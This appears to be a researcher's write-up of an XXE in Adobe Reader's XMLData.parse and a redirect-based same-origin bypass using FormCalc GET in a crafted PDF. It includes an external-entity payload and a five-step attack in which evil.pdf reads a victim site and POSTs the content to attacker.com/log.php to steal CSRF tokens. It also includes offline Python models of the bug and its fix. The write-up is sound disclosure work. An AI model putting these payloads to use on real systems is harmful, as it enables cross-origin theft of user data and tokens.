PDF Upload - XXE and CORS bypass
Status: Fixed
Reality: Not Fixed

This one is about a simple XXE I discovered. I read the paper "Polyglots: Crossing Origins by Crossing Formats", where they discussed a vulnerability in XMLData.parse. It was possible to use external entities and reference them. I read the specification and it turns out there are more functions than "parse" to read XML. I created a simple XML file, which references a URL from the same domain, and parsed it with loadXML. It worked:
7 0 obj
// cXMLDoc is a harmless control document; cXMLDoc2 declares an external
// entity (SYSTEM) pointing at the document's own origin and references it
var cXMLDoc = '<?xml version="1.0" encoding="ISO-8859-1"?><foo>muh</foo>'
var cXMLDoc2 = '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ENTITY aaaa SYSTEM "http://example.com">]><ab>&aaaa;</ab>'
xml = XMLData.parse(cXMLDoc,false);
// parsing the second document resolves &aaaa;, i.e. Reader fetches
// http://example.com and the response becomes the text of <ab>
xml2 = XMLData.parse(cXMLDoc2,false);
The impact is limited because:
o) it is limited to same origin
o) HTML pages break the XML (an HTML body is not well-formed XML, so the parse fails instead of returning the page)
o) dynamic entities are not supported
o) I had the idea to use a UTF-16 XML to avoid breaking the XML structure, but it didn't work.
But it still can be used to read JSON.
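To make the same-origin limitation and the "HTML breaks it, JSON survives" point concrete, here is an added example that is not the post's code: a model of the restricted XXE read built on Python's expat parser, which resolves external entities through a handler exactly the way the payload above expects. The origin, URLs and response bodies in FAKE_NETWORK are constructed placeholders, and the "same-origin only, body parsed as XML" policy is an assumption modelling the behaviour described, not Reader's actual implementation.

```python
"""Added example (not the post's code): a model of the same-origin XXE read
described above, built on Python's expat parser so it runs offline.

Assumptions: DOC_ORIGIN and the URLs/bodies in FAKE_NETWORK are constructed
placeholders; the policy modelled (same origin only, fetched body parsed as
XML content) is taken from the post's description, not from Reader's code."""
import xml.parsers.expat
from urllib.parse import urlsplit

# Origin of the document carrying the XML payload (assumed placeholder).
DOC_ORIGIN = "http://example.com"

# Constructed stand-in for the network: what a GET of each URL would return.
FAKE_NETWORK = {
    # JSON is plain character data to an XML parser, so it survives expansion
    "http://example.com/api/me.json": '{"user":"alice","csrf":"t0k3n"}',
    # HTML is not well-formed XML: a DOCTYPE and an unclosed <br> inside an
    # external entity are fatal errors, which is why HTML pages break the read
    "http://example.com/index.html": "<!DOCTYPE html><html><body>hi<br></body></html>",
    # a different origin: the same-origin-only resolver must never fetch it
    "http://attacker.test/x": "cross-origin secret",
}


def origin(url):
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()


def xxe_payload(url):
    """The payload shape from the post: a SYSTEM entity referenced in content."""
    return ('<?xml version="1.0"?>'
            f'<!DOCTYPE foo [<!ENTITY aaaa SYSTEM "{url}">]>'
            '<ab>&aaaa;</ab>')


def xxe_read(payload_xml, doc_origin=DOC_ORIGIN, network=FAKE_NETWORK):
    """Parse attacker XML, resolving SYSTEM entities like the restricted parser
    described above: same origin only, and the fetched body is parsed as XML.
    Returns the character data that ended up inside the root element."""
    collected = []
    parser = xml.parsers.expat.ParserCreate()

    def on_chars(data):
        collected.append(data)

    def on_external_entity(context, base, system_id, public_id):
        # Same-origin restriction: refuse before anything is fetched.
        if origin(system_id) != doc_origin:
            raise PermissionError(f"cross-origin entity refused: {system_id}")
        body = network[system_id]
        # A child parser consumes the fetched bytes as XML content; a
        # non-XML body (HTML) raises ExpatError and the whole read fails.
        child = parser.ExternalEntityParserCreate(context)
        child.CharacterDataHandler = on_chars
        child.Parse(body, True)
        return 1

    parser.CharacterDataHandler = on_chars
    parser.ExternalEntityRefHandler = on_external_entity
    parser.Parse(payload_xml, True)
    return "".join(collected)


def attempt(url):
    """Return ('ok', leaked text) or ('fail', exception class name)."""
    try:
        return ("ok", xxe_read(xxe_payload(url)))
    except (xml.parsers.expat.ExpatError, PermissionError) as exc:
        return ("fail", type(exc).__name__)


if __name__ == "__main__":
    for target in FAKE_NETWORK:
        print(target, "->", attempt(target))
```

Run it and the JSON endpoint comes back verbatim as the text of <ab>, the HTML page fails with an ExpatError from the child parser, and the cross-origin URL is refused before any fetch happens; that is the whole reason the technique is useful against JSON APIs and not against ordinary pages.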
% a PDF file using an XFA
% most whitespace can be removed (truncated to 570 bytes or so...)
% Ange Albertini BSD Licence 2012
% modified by insertscript
%PDF-1. % can be truncated to %PDF-\0
1 0 obj <<>>
<field id="Hello World!">
var content = GET("myfriends.php");
/XFA 1 0 R
After I found these functions, I found a same origin policy bypass. This makes it possible to use a victim's browser as a proxy (@beef still working on the module^^). The bypass is really simple:
1. User A loads evil.pdf from http://attacker.com/evil.pdf
2. evil.pdf uses FormCalc GET to read http://attacker.com/redirect.php
3. redirect.php redirects with a 301 to http://facebook.com
4. Adobe Reader follows the redirect and reads the response without looking for a crossdomain.xml on the new origin
5. evil.pdf sends the retrieved content via POST to http://attacker.com/log.php
Note that using this technique you can steal the CSRF tokens of a page and abuse CSRF vulns.
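The defect in step 4 is that the cross-domain policy was evaluated once, for the URL the script asked for, and never again after a redirect changed the origin. The following is an added example, not the post's or Adobe's code: an offline model of FormCalc GET against a constructed table of HTTP responses, with a switch between "check once, then follow redirects blindly" and "re-check at every hop". The hostnames attacker.test, victim.test and partner.test, the paths, the response bodies and the simplified policy (same origin, otherwise the target's crossdomain.xml must name the requesting host) are all assumptions for illustration.

```python
"""Added example (not the post's code): a model of the redirect bypass in
steps 1-5 above and of the check that closes it. Runs offline against a
constructed table of HTTP responses.

Assumptions: the hostnames attacker.test / victim.test / partner.test, the
paths and bodies are placeholders; the policy model (same origin, otherwise
the target's crossdomain.xml must name the requesting host) is a
simplification of Reader's real cross-domain policy."""
import xml.etree.ElementTree as ET
from urllib.parse import urljoin, urlsplit

# Constructed network: url -> (status, headers, body)
NETWORK = {
    # steps 2/3: the attacker's redirector
    "http://attacker.test/redirect.php": (
        301, {"Location": "http://victim.test/profile"}, ""),
    # the cross-origin page the attacker wants to read (carries a CSRF token)
    "http://victim.test/profile": (
        200, {}, '<input type="hidden" name="csrf" value="t0k3n">'),
    # victim.test only grants cross-domain reads to partner.test
    "http://victim.test/crossdomain.xml": (
        200, {}, '<cross-domain-policy>'
                 '<allow-access-from domain="partner.test"/>'
                 '</cross-domain-policy>'),
}


def origin(url):
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()


def crossdomain_allows(target_origin, requester_host, network):
    """True if target_origin/crossdomain.xml has an allow-access-from rule
    matching requester_host (exact host, '*', or a '*.suffix' wildcard)."""
    resp = network.get(target_origin + "/crossdomain.xml")
    if resp is None or resp[0] != 200:
        return False
    for rule in ET.fromstring(resp[2]).iter("allow-access-from"):
        d = rule.get("domain", "")
        if d == "*" or d == requester_host:
            return True
        if d.startswith("*.") and requester_host.endswith(d[1:]):
            return True
    return False


def formcalc_get(url, doc_url, network=NETWORK, recheck_on_redirect=True):
    """Model of FormCalc GET issued by a document loaded from doc_url.

    recheck_on_redirect=False reproduces the bug: the policy is evaluated
    for the URL the script asked for, then redirects are followed blindly
    (step 4). True re-evaluates it at every hop, so a redirect to another
    origin is subject to that origin's crossdomain.xml."""
    doc_origin = origin(doc_url)
    requester_host = urlsplit(doc_url).hostname
    for hop in range(6):
        if hop == 0 or recheck_on_redirect:
            if origin(url) != doc_origin and not crossdomain_allows(
                    origin(url), requester_host, network):
                raise PermissionError(f"cross-origin read refused: {url}")
        status, headers, body = network[url]
        if status not in (301, 302, 303, 307, 308):
            return body
        # follow the redirect; the next iteration decides whether it is checked
        url = urljoin(url, headers["Location"])
    raise RuntimeError("too many redirects")


def try_get(url, doc_url, recheck_on_redirect):
    """GET wrapper for the demo: the leaked body, or None if the policy refused."""
    try:
        return formcalc_get(url, doc_url, recheck_on_redirect=recheck_on_redirect)
    except PermissionError:
        return None


if __name__ == "__main__":
    evil = "http://attacker.test/evil.pdf"
    print("vulnerable:", try_get("http://attacker.test/redirect.php", evil, False))
    print("fixed:     ", try_get("http://attacker.test/redirect.php", evil, True))
```

With the check done once, evil.pdf reads victim.test/profile (token included) through its own redirector; with the check repeated at each hop, the hop to victim.test is refused because victim.test's crossdomain.xml does not name attacker.test, while a document served from partner.test can still read it, which is what the policy file is for.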
This simple bypass is fixed now. I hope they are going to implement a dialog warning for same origin requests too.